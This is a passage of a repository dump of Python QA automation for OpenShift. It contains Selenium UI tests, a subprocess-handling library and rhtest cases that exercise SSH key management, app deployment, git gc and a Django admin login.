%d gears found\" % (len(gear_lst)))\n gear_num = common.get_num_of_gears_by_web(self.app_name, self.app_type)\n self.assert_equal(gear_num, 2, \"Unable to verify scale up\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n ''' Used common function instead!\n def verify_scale_up(self, url, retry_times=10):\n gear_lst = []\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n for i in range(retry_times):\n (ret, output) = common.command_getstatusoutput(cmd, quiet=True)\n if ret != 0:\n time.sleep(3)\n else:\n pattern = re.compile(r'(?<=Gear DNS: ).+com', re.M)\n match = pattern.search(output)\n if match == None:\n time.sleep(3)\n elif match.group(0) not in gear_lst and output.find(\"There are %s records in database\" % (self.record_count)) != -1:\n gear_lst.append(match.group(0))\n self.debug(\"Gears found: \" + ' '.join(gear_lst))\n return gear_lst\n '''\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingAfterAlterDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7384868264198303, "alphanum_fraction": 0.7401315569877625, "avg_line_length": 27.952381134033203, "blob_id": "c6b03d81ee8c424477bed0a50bae04ad5c40c758", "content_id": "6b545a01f89a6a2eb7daac4c1224dcbbf89a277b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/automation/iframehandle.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\n\n\nbase_url = \"https://maitai.app.qa.eng.nay.redhat.com/\" \n\n\ndriver = webdriver.Firefox()\ndriver.get(base_url)\n\ndriver.find_element_by_id(\"username\").send_keys(\"xgao\")\ndriver.find_element_by_id(\"password\").send_keys(\"redhat\")\ndriver.find_element_by_id(\"password\").submit()\n\ndriver.find_element_by_link_text(\"Start Process\").click()\ndriver.find_element_by_link_text(\"Simple demo process\").click()\n\ndriver.switch_to_frame('form_view')\ntime.sleep(5)\ndriver.find_element_by_id(\"description\").send_keys(\"xgao test so so\")\ndriver.find_element_by_id(\"description\").submit()\n" }, { "alpha_fraction": 0.6624242663383484, "alphanum_fraction": 0.6745454668998718, "avg_line_length": 40.25, "blob_id": "11f88c0ee92bd614316fc6f7546271395597a628", "content_id": "638587cb319d53d37d333787b252287c8f329e3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1650, "license_type": "no_license", "max_line_length": 144, "num_lines": 40, "path": "/automation/open/testmodules/UI/web/US1797_135713.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135713(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n def test_u_s1797135713(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n baseutils.go_to_account_page(self)\n driver.find_element_by_link_text(\"Change password...\").click()\n 
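        # Editor's note: the assertion below relies on
        # baseutils.assert_text_equal_by_xpath(), which is defined elsewhere
        # in this repo and not shown here. A minimal sketch of such a
        # verify-style helper, purely for illustration (the name, signature
        # and behaviour are assumptions, not the repo's actual code):
        def _assert_text_equal_by_xpath_sketch(test, expected, xpath):
            # Compare the element's visible text with the expectation and
            # record a mismatch instead of aborting, so the test keeps
            # collecting failures in test.verificationErrors.
            try:
                actual = test.driver.find_element_by_xpath(xpath).text
                test.assertEqual(expected, actual)
            except AssertionError, e:
                test.verificationErrors.append(str(e))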
driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(\"ewqewqewq\")\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(\"qweqweqwe\")\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"asdasdasdasd\\t\")\n baseutils.assert_text_equal_by_xpath(self, \"Please enter the same value again.\",\"//*[@id='web_user_password_confirmation_input']/div/p\")\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5219137072563171, "alphanum_fraction": 0.5304449796676636, "avg_line_length": 32.58427047729492, "blob_id": "842f7f73c4078fc483b25dfaa9b71a6f1c5573c9", "content_id": "1f3afea85a498ed176e800e531b94be7c15f8ca3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5978, "license_type": "no_license", "max_line_length": 138, "num_lines": 178, "path": "/automation/open/lib/proc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os,sys,re,time,subprocess,select,fcntl,signal\nimport Queue\nimport threading\nimport signal\nimport datetime\n\nclass Proc(object):\n def __init__(self, cmd, shell=True, stdin=subprocess.PIPE):\n self.cmd = cmd\n self.output = []\n self.lastoutput = []\n self.input = []\n self.proc = subprocess.Popen(cmd, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=0, shell=shell)\n #preexec_fn=os.setsid\n def __read_output__(self, timeout=1):\n outfds, infds, errfds = select.select([self.proc.stdout], [], [], timeout)\n if len(outfds) != 0:\n flags = fcntl.fcntl(outfds[0], fcntl.F_GETFL, 0)\n fcntl.fcntl(outfds[0], fcntl.F_SETFL, flags | os.O_NONBLOCK)\n s = outfds[0].read()\n if s != '':\n self.lastoutput.append(s)\n self.output.append(s)\n return 0\n else:\n return 1\n else:\n return 1\n\n def __write_input__(self, input_data, timeout=1):\n outfds, infds, errfds = select.select([], [self.proc.stdin], [], timeout)\n if len(infds) != 0:\n flags = fcntl.fcntl(infds[0], fcntl.F_GETFL, 0)\n fcntl.fcntl(infds[0], fcntl.F_SETFL, flags | os.O_NONBLOCK)\n infds[0].write(input_data)\n return 0\n else:\n return 1\n\n def input_cmd(self, cmd, timeout=3):\n self.input.append(cmd)\n print \"\\nCommand: \", cmd\n return self.__write_input__(cmd, timeout)\n\n def kill(self, sig=signal.SIGTERM):\n self.proc.send_signal(sig)\n if sig == signal.SIGTERM or sig == signal.SIGKILL:\n time.sleep(1)\n if self.proc.poll() == None:\n return 1\n else:\n return 0\n return 0\n\n def wait(self, delay=2, count=5):\n '''Wait delay*count seconds for process to finish'''\n while count > 0:\n count -= 1\n retcode = self.proc.poll()\n if retcode != None:\n return retcode\n time.sleep(delay)\n return None\n\n def grep_output(self, regex, delay=3, count=5, flag=re.S, show_output=True):\n pattern = re.compile(regex)\n ret = 1\n while count > 0:\n count -= 1\n self.__read_output__(delay)\n match_lst = pattern.findall(''.join(self.output), flag)\n if match_lst != []:\n ret = 0\n print \"According to regex '%s', found %s\" % (regex, match_lst)\n break\n time.sleep(delay)\n if ret == 1:\n print 
\"Regex '%s' didn't match any string in the output\" % (regex)\n if show_output == True:\n self.print_lastoutput()\n return ret\n\n def get_full_output(self, delay=3, count=5):\n retry = count\n while count > 0:\n count -= 1\n if self.__read_output__(1) == 0:\n count = retry\n time.sleep(delay)\n return ''.join(self.output)\n\n def print_lastoutput(self, timeout=1):\n self.__read_output__(timeout)\n print '<***********last output of the proc************>'\n sys.stdout.write(''.join(self.lastoutput))\n print '<*************end of last output***************>'\n self.lastoutput = []\n\n def print_output(self, timeout=1):\n self.__read_output__(timeout)\n print '<***********full output of the proc************>'\n sys.stdout.write(''.join(self.output))\n print '<*************end of full output***************>'\n\n\nclass AsynchronousFileReader(threading.Thread):\n def __init__(self, fd, queue, quiet=False):\n threading.Thread.__init__(self)\n self.daemon = True\n self._fd = fd\n self._queue = queue\n self._stop = False\n self._quiet = quiet\n\n def stop(self):\n self._stop = True\n\n def run(self):\n for line in iter(self._fd.readline, ''):\n if not self._quiet:\n sys.stdout.write(line)\n self._queue.put(line, timeout=3)\n if self._stop == True:\n self._fd.close()\n return\n\n def eof(self):\n return not self.is_alive() and self._queue.empty()\n\nclass ProcNonBlock(object):\n def __init__(self, cmd, quiet=False):\n if not quiet:\n print \"\\nCommand: %s\" % (cmd)\n self.cmd = cmd\n self._output = []\n self._queue = Queue.Queue()\n self._proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=0, shell=True)\n self._reader = AsynchronousFileReader(self._proc.stdout, self._queue, quiet)\n self._reader.start()\n\n def __del__(self):\n try:\n self.kill()\n except OSError:\n pass\n\n def kill(self, sig=signal.SIGKILL):\n self._reader.stop()\n self._proc.terminate()\n\n def poll(self):\n return self._proc.poll()\n\n def wait(self, timeout=None):\n begin_time = datetime.datetime.now()\n if timeout == None:\n self._proc.wait()\n return self._proc.poll()\n while self._proc.poll() == None and (datetime.datetime.now() - begin_time).seconds < timeout:\n time.sleep(1)\n return self._proc.poll()\n\n # If no new output generated within 10 secs, kill the subprocess\n def wait_output(self, timeout=10):\n begin_time = datetime.datetime.now()\n prev_size = self._queue.qsize()\n while (datetime.datetime.now() - begin_time).seconds < timeout:\n time.sleep(1)\n cur_size = self._queue.qsize()\n if cur_size != prev_size:\n begin_time = datetime.datetime.now()\n prev_size = cur_size\n\n def output(self):\n while not self._queue.empty():\n self._output.append(self._queue.get(timeout=3))\n return ''.join(self._output)\n" }, { "alpha_fraction": 0.6288859844207764, "alphanum_fraction": 0.6379533410072327, "avg_line_length": 32.20429992675781, "blob_id": "9fb3d21902b3951d727461473bc7e5c607f89d21", "content_id": "000b715c0055e7b39f9e25a44097f78486216fe2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3088, "license_type": "no_license", "max_line_length": 152, "num_lines": 93, "path": "/automation/open/testmodules/RT/client/add_sshkey.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = 
rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.domain_name = common.get_domain_name()\n\tself.key_filename=\"my_testing_second_key\"\n\tself.new_keyname=\"second\"\n tcms_testcase_id=129190\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass AddSshKey(OpenShiftTest):\n def cleanup(self):\n os.system(\"rm -f %s*\" % (self.key_filename))\n common.remove_sshkey(self.new_keyname, self.user_email, self.user_passwd)\n\n def test_method(self):\n\tself.steps_list.append(testcase.TestCaseStep(\"Just for sure from previus testing... - remove that key file\",\n \"rm -f %s*\" % (self.key_filename)))\n\n self.steps_list.append(testcase.TestCaseStep(\"Just for sure from previus testing... - remove that key\",\n common.remove_sshkey,\n function_parameters=[self.new_keyname, self.user_email, self.user_passwd],\n ))\n\n \tself.steps_list.append(testcase.TestCaseStep(\"Create a ssh key\" ,\n \"ssh-keygen -t dsa -f %s -N '' \"% self.key_filename,\n expect_return=0))\n\n \tself.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % self.key_filename, self.new_keyname],\n expect_return=0))\n\n \tself.steps_list.append(testcase.TestCaseStep(\"Check the presence of the key in the list\",\n \"rhc sshkey list -l %s -p '%s' %s | grep -i '%s' \"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS, self.new_keyname),\n expect_return=0))\n\n# [US1652][UI][CLI] Multi key management rhc-user-info\n# https://tcms.engineering.redhat.com/case/129190/?from_plan=4962\n#\n \tself.steps_list.append(testcase.TestCaseStep(\"Check the presence of the key in the list\",\n \"rhc sshkey list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list = [\"%s\"% self.new_keyname],\n expect_return=0))\n\n\n##################################################################\n \tcase = testcase.TestCase(\"[US1652][UI][CLI] Call multi-key management CLI to add a ssh key with valid key-name\",\n steps=self.steps_list)\n\n \tcase.add_clean_up(self.cleanup)\n \tcase.run()\n\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddSshKey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5709639191627502, "alphanum_fraction": 0.584269642829895, "avg_line_length": 32.48514938354492, "blob_id": "efd03eee960e2a0b4ec0853cb056f25e77569ea8", "content_id": "f48b0fea01c95214317ae1240013c1c96b3d178f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3382, "license_type": "no_license", "max_line_length": 129, "num_lines": 101, "path": "/automation/open/testmodules/RT/cartridge/jbossas_java_ee.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 2, 2012\n\"\"\"\nimport rhtest\nimport common\nimport OSConf\nimport os\nimport pycurl\nfrom shutil import rmtree\nfrom time import sleep\n\nclass 
JBossJavaEETest(rhtest.Test):\n\n def initialize(self):\n self.application_name = common.getRandomString()\n self.git_repo = './%s' % self.application_name\n self.summary = '[US2296][Runtime][rhc-cartridge] EE6 application with JNDI, remote EJBs, and JMS [P1]'\n common.env_setup()\n\n def finalize(self):\n rmtree(self.git_repo)\n \n def test_method(self):\n self.info('=' * 80)\n self.info('Creating the application')\n self.info('=' * 80)\n ret = common.create_app(\n self.application_name,\n common.app_types['jbossas'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n self.assert_equal(ret, 0, \"Failed to create app\")\n\n self.info('=' * 80)\n self.info('Deploying the application')\n self.info('=' * 80)\n deployment_steps = [\n 'cp -v %s %s' % ( os.path.dirname(__file__) + '/app_template/sfsbTest-1.0.war', self.git_repo + '/deployments' ),\n 'cd %s' % self.git_repo,\n 'git add .',\n 'git commit -a -m \"Adding testing app\"',\n 'git push'\n ]\n common.command_get_status(' && '.join(deployment_steps))\n self.info('Waiting for the application...')\n sleep(60)\n\n self.info('=' * 80)\n self.info('Invoking testing servlet')\n self.info('=' * 80)\n curl = pycurl.Curl()\n curl.setopt(pycurl.URL, 'http://' + OSConf.get_app_url(self.application_name) + '/sfsbTest-1.0/SfsbServlet')\n curl.setopt(pycurl.VERBOSE, 1)\n curl.perform()\n self.info('Asserting that the return code is 200')\n self.assert_equal(curl.getinfo(pycurl.HTTP_CODE), 200)\n\n self.info('=' * 80)\n self.info('Verifying server.log')\n self.info('=' * 80)\n ( ret_code, ret_output ) = common.run_remote_cmd(self.application_name, 'cat %s/logs/server.log' % self.application_name)\n pattern_list = [\n 'java:module/EntityTesterBean',\n 'java:module/StatelessBean1!org.jboss.jndiTest.StatelessBean1Local',\n 'Received new cluster view',\n 'MBeans were successfully registered to the platform mbean server',\n 'Started repl cache from ejb container',\n 'Added a new EJB receiver in cluster context ejb for node',\n 'Stateless called',\n 'JMS message sent',\n ]\n missing_pattern = [ ]\n for pattern in pattern_list:\n result = 'OK'\n if ret_output.find(pattern) == -1:\n missing_pattern.append(pattern)\n result = 'FAIL'\n self.info(\"Looking for pattern '%s'... 
%s\" % ( pattern, result ))\n self.info('Asserting that all the patterns are found...')\n self.assert_equal(len(missing_pattern), 0)\n \n # Everything is OK\n return self.passed(self.summary)\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossJavaEETest)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5941907167434692, "alphanum_fraction": 0.6178643107414246, "avg_line_length": 43.774436950683594, "blob_id": "881b17e064ef55f516415faa1f86b99c8de061a8", "content_id": "fa2c30d3f0db45d3ef652bfc1dd836f3719c9547", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5956, "license_type": "no_license", "max_line_length": 273, "num_lines": 133, "path": "/automation/open/testmodules/UI/web/case_165704.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165704.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckGetInvolvedPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n web.go_to_community()\n web.click_element_by_xpath('''//a[contains(@href, '/community/get-involved')]''')\n time.sleep(2)\n\n #check the \"OpenShift\" link \n web.assert_text_equal_by_xpath(\"OpenShift\",'''//div[@id='node-9465']/div/p[2]/a''')\n web.click_element_by_link_text(\"OpenShift\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift is Red Hat's free, auto-scaling Platform as a Service (PaaS) for applications. 
As an application platform in the cloud, OpenShift manages the stack so you can focus on your code.''','''//body/header/nav/div[2]/div/h2''') \n web.go_back() \n #check the \" OpenShift Origin LiveCD\" link \n web.assert_text_equal_by_xpath(\"OpenShift Origin LiveCD\",'''//div[@id='node-9465']/div/p[2]/a[2]''')\n web.click_element_by_link_text(\"OpenShift Origin LiveCD\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift Origin Source Code''','''//div[@id='content']/div/div/div/div/div/h1''') \n web.go_back()\n #check the \" examples and quickstarts.\" link \n web.assert_text_equal_by_xpath(\"examples and quickstarts\",'''//div[@id='node-9465']/div/p[3]/a''')\n web.click_element_by_link_text(\"examples and quickstarts\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Started on OpenShift''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"DIY application \" link \n web.assert_text_equal_by_xpath(\"DIY application\",'''//div[@id='node-9465']/div/p[4]/a''')\n web.click_element_by_link_text(\"DIY application\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''A PaaS that runs anything HTTP: Getting Started with DIY Applications on OpenShift''','''//div[@id='content']/div/div/div/div[3]/div/section/article/h1''') \n web.go_back() \n #check the \" Tweet \" ,\"Facebook\" and \" Google+.\" link \n web.assert_text_equal_by_xpath(\"Tweet\",'''////a[contains(@href, 'https://twitter.com/#!/openshift')]''')\n web.assert_text_equal_by_xpath(\"Facebook\",'''//a[contains(@href, 'https://www.facebook.com/openshift')]''')\n web.assert_text_equal_by_xpath(\"Google+\",'''//a[contains(@href, 'https://plus.google.com/108052331678796731786/posts')]''')\n\n #check the \"forums\" link \n web.assert_text_equal_by_xpath(\"forums\",'''//div[@id='node-9465']/div/p[6]/a''')\n web.click_element_by_link_text(\"forums\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Forums''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back() \n #check the \"IRC \" link \n web.assert_text_equal_by_xpath(\"IRC\",'''//div[@id='node-9465']/div/p[6]/a[2]''')\n web.click_element_by_link_text(\"IRC\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connect to freenode IRC''','''//body/div/div[2]/table/tbody/tr/td/table/tbody/tr/td/h1''') \n web.go_back() \n\n\n\n #check the \"report bugs\" link \n web.assert_text_equal_by_xpath(\"report bugs\",'''//div[@id='node-9465']/div/p[7]/a''')\n web.assert_text_equal_by_xpath(\"report bugs\",'''//a[contains(@href, 'https://bugzilla.redhat.com/enter_bug.cgi?product=OpenShift')]''')\n web.go_back() \n #check the \"suggest or vote on new features\" link \n web.assert_text_equal_by_xpath(\"suggest or vote on new features\",'''//div[@id='node-9465']/div/p[7]/a[2]''')\n web.click_element_by_link_text(\"suggest or vote on new features\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Vote on Features''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back() \n #check the \"fix bugs\" link \n web.assert_text_equal_by_xpath(\"fix bugs\",'''//div[@id='node-9465']/div/p[8]/a''')\n web.assert_text_equal_by_xpath(\"fix bugs\",'''//a[contains(@href, 'https://bugzilla.redhat.com/buglist.cgi?query_format=specific&order=relevance+desc&bug_status=__open__&product=OpenShift')]''')\n #check the \"contribute patches\" link \n web.assert_text_equal_by_xpath(\"contribute patches\",'''//div[@id='node-9465']/div/p[8]/a[2]''')\n web.click_element_by_link_text(\"contribute patches\")\n time.sleep(2)\n 
web.assert_text_equal_by_xpath('''GitHub workflow for submitting pull requests''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \" write sample applications and quickstarts \" link \n web.assert_text_equal_by_xpath(\"write sample applications and quickstarts\",'''//div[@id='node-9465']/div/p[9]/a''')\n web.click_element_by_link_text(\"write sample applications and quickstarts\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''How to create an OpenShift github quick start project''','''//div[@id='content']/div/div/div/div[3]/div/section/article/h1''') \n web.go_back() \n\n \n\n \n\n\n\n\n self.tearDown()\n\n return self.passed(\" case_165704--CheckGetInvolvedPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckGetInvolvedPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165704.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5659125447273254, "alphanum_fraction": 0.5752639770507812, "avg_line_length": 29.685184478759766, "blob_id": "5b97a14cef03a9f89e357a76962d6d2b88e70bfb", "content_id": "3c45cd7f74e881ac8fd2b8cdeb8ad11e58426e99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3315, "license_type": "no_license", "max_line_length": 115, "num_lines": 108, "path": "/automation/open/testmodules/RT/cartridge/git_repo_cleanup_gc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 23, 2012\n\n[US1107][rhc-cartridge] App git repo cleanup using git gc\nhttps://tcms.engineering.redhat.com/case/122511/\n\"\"\"\n\nimport os\nimport sys\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\n self.summary = \"[US1107][rhc-cartridge] App git repo cleanup using git gc\"\n test_name = \"python\"\n self.app_type = common.app_types[test_name]\n self.app_name = 'my%s%s' % ( test_name, common.getRandomString() )\n self.git_repo = './' + self.app_name\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass GitRepoCleanupGc(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Performing 'git gc' and comparing git repo sizes\",\n self.comparing_git_repo_size,\n expect_description = \"The new size of the git repo must be less than it was before 'git gc'\",\n expect_return = 1)) # It's a Python function, so it returns 1 if the comparation was successfull\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n 
return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def comparing_git_repo_size(self):\n \"\"\"\n This functions returns 1 if the comperation was successfull ( new_size < original_size)\n Returns 0 otherwise\n \"\"\"\n try:\n original_size = common.get_git_repo_size(self.app_name)\n except Exception as e:\n raise rhtest.TestIncompleteError(str(e))\n\n ( gc_rc, gc_output ) = common.run_remote_cmd(self.app_name, r\"cd git/%s.git && git gc\" % ( self.app_name ))\n if gc_rc != 0:\n print \"Failed to execute 'git gc'\"\n return 0\n\n try:\n new_size = common.get_git_repo_size(self.app_name)\n except Exception as e:\n raise rhtest.TestIncompleteError(str(e))\n\n if int(new_size) < int(original_size):\n return 1\n else:\n return 0\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GitRepoCleanupGc)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6051847338676453, "alphanum_fraction": 0.6102502942085266, "avg_line_length": 30.660377502441406, "blob_id": "0709f78153eaa9653aa556380858666799bf694c", "content_id": "6187c9003bd8f786a04cc559a8c76e9df22f7518", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3356, "license_type": "no_license", "max_line_length": 118, "num_lines": 106, "path": "/automation/open/testmodules/RT/quick_start/quick_start_django_login.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\nimport OSConf\nimport re\nimport pycurl\nimport os\nfrom time import sleep\nfrom StringIO import StringIO\nimport urllib\n\n# user defined packages\nfrom quick_start_django import QuickStartDjango\n\nclass QuickStartDjangoLogin(QuickStartDjango):\n \n def __init__(self, config):\n QuickStartDjango.__init__(self, config)\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: django - Logging into admin interface\"\n self.config.cookie_file = \"/tmp/%s.txt\" % common.getRandomString(30)\n\n def finalize(self):\n QuickStartDjango.finalize(self)\n if os.path.exists(self.config.cookie_file):\n os.remove(self.config.cookie_file)\n \n\n def deployment_steps(self):\n # Deploying\n ( ret_code, ret_output ) = QuickStartDjango.deployment_steps(self)\n \n # Looking for the admin password\n admin_password = \"\"\n match = re.search(r'Django application credentials.*\\n.*\\nremote:[^\\w]*([\\w]*).*\\n', ret_output, re.MULTILINE)\n if match:\n admin_password = match.group(1).strip()\n\n self.assert_true(admin_password != \"\")\n self.config.admin_password = admin_password\n\n self.info(\"Admin password found: \" + self.config.admin_password)\n\n def verification(self):\n self.log_info(\"Verifying\")\n sleep(10) # Waiting 10 minutes for the application\n\n # Fetching the form to get CSRF cookie\n admin_page = \"http://\" + OSConf.get_app_url(self.config.application_name) + \"/admin/\"\n b = StringIO()\n self.info(\"Fetching admin form...\")\n self.info(\"Admin page URL: \" + admin_page)\n curl = pycurl.Curl()\n curl.setopt(pycurl.URL, admin_page)\n curl.setopt(pycurl.VERBOSE, 1)\n curl.setopt(pycurl.COOKIEJAR, self.config.cookie_file)\n curl.setopt(pycurl.WRITEFUNCTION, b.write)\n curl.setopt(pycurl.FOLLOWLOCATION, 1)\n 
curl.perform()\n\n match = re.search(r\"name='csrfmiddlewaretoken' value='(.+)'\", b.getvalue())\n csrf_cookie = \"\"\n if match:\n csrf_cookie = match.group(1) \n self.info(\"CSRF Cookie: \" + csrf_cookie)\n \n # Logging in \n admin_page_html = StringIO()\n curl.setopt(pycurl.POST, 1)\n curl.setopt(pycurl.WRITEFUNCTION, admin_page_html.write)\n post_data = urllib.urlencode(\n {\n 'username' : 'admin' ,\n 'password' : self.config.admin_password,\n 'this_is_the_login_form' : 1,\n 'next' : '/admin/',\n 'csrfmiddlewaretoken' : csrf_cookie\n }\n )\n curl.setopt(pycurl.POSTFIELDS, post_data)\n curl.perform()\n\n admin_page_html_source = admin_page_html.getvalue()\n self.info(\"=\"*30)\n self.info(admin_page_html_source)\n self.info(\"=\"*30)\n\n self.assert_true(admin_page_html_source.find(\"Site administration\") != -1)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDjangoLogin)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7177033424377441, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 15.076923370361328, "blob_id": "5ff8171ce06b851ffc854f31a40946602922de5c", "content_id": "c0080cdd9a1750430a86415f91746d49afbcacdb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 209, "license_type": "no_license", "max_line_length": 36, "num_lines": 13, "path": "/automation/multi_browser.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\n\nfrom ipdb import set_trace\nset_trace()\n\n\ndriver1 = 